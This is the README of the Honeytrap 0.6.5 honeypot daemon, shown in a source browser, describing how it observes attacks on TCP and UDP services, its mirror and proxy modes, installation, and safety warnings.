root/honeytrap/tags/0.6.5/README

Revision 1081, 3.4 kB (checked in by till, 2 years ago)

initial import

Line 
1 README
2
3   Honeytrap  is  a network security tool written to observe attacks
4   against TCP or UDP services. It runs as a daemon and starts serv-
5   er  processes dynamically on requested ports. A server emulates a
6   well-known service by simply sending captured network traffic  to
7   a connected host.
8
9   Many  clients  and particularly attackers will be fooled and send
10   responses to a honeytrap server process. The arriving data is as-
11   sembled to a string and written to a database file. Such a string
12   is called an attack string.
13
14   Honeytrap can parse an attack string for  commands  advising  the
15   server  to  download a file from another host. If a download com-
16   mand is found, the server tries  to  retrieve  the  corresponding
17   file  automatically.  A downloaded file is stored locally with an
18   md5 checksum in its name. Currently, only ftp and tftp  are  sup-
19   ported.  Honeytrap implements its own clients with the aim to be-
20   have as similar as possible than Windows systems. Http  URIs  are
21   recognized  and  logged.  A http download routine may be added in
22   future releases.
23
24   Version 0.5.0 introduces the mirror mode (option '-m'). When run-
25   ning in this mode, whenever a connection request is handled, hon-
26   eytrap tries to establish a so called mirror connection  back  to
27   the  remote  host  requesting the same port. All data received on
28   one of the two connections is copied to the other one. Thus, hon-
29   eytrap is acting as a tcp proxy for a connection of a remote host
30   with itself. If no mirror connection can be  established,  honey-
31   trap falls back to normal mode.
32
33   A  plugin  interface  was  added in Version 0.6.0. Plugins can be
34   loaded as dynamic shared objects. Also, honeytrap can now be con-
35   figured  via a configuration file. The file is reprocessed when a
36   SIGHUP is received so changes can be  made  available  with  zero
37   downtime.
38
39   Version  0.6.2  comes  with  lots  of new features. Using the new
40   proxy mode, Connections can not only be mirrored back to the ini-
41   tiator,  but proxied to other systems and other ports. The appro-
42   priate mode can optionally be configured per TCP port. A new, li-
43   bipq-based  connection  monitor  was introduced (idea stolen from
44   the nepenthes honeytrap module).
45
46 INSTALLATION
47
48   Installation of honeytrap should be pretty straight forward. Just
49   do  a  './configure  --with-<type>-mon  &&  make && make install'
50   where '<type>' is the connection monitor  type  of  your  choice.
51   Please  refer to the INSTALL file and to the output of './config-
52   ure --help' for further information.
53
54 WARNINGS
55
56   Honeytrap is a low-interactive honeypot and therefore detectable.
57   It  is  written  in  C  and thus potentially vulnerable to buffer
58   overflow attacks. Take care. Running in mirror mode is dangerous.
59   Attacks  may  be directed to the attacker, appearing to come from
60   your system. Use with caution.
61
62   The program needs root privileges, but only  for  binding  server
63   processes to well-known ports. Use the -u and -g command line op-
64   tions to drop privileges and switch to another user and group  as
65   early as possible.
66
67 THANKS
68
69   Many thanks to Steve, Gary to help me debugging compile errors on
70   FreeBSD and OpenBSD and to lots of others who  helped  me  fixing
71   bugs.
72
73 CONTACT
74
75   If  you  have  problems,  questions, ideas or suggestions, please
76   contact me at <tillmann.werner@gmx.de>. If you would like to help
77   making honeytrap better, you are welcome.
Note: See TracBrowser for help on using the browser.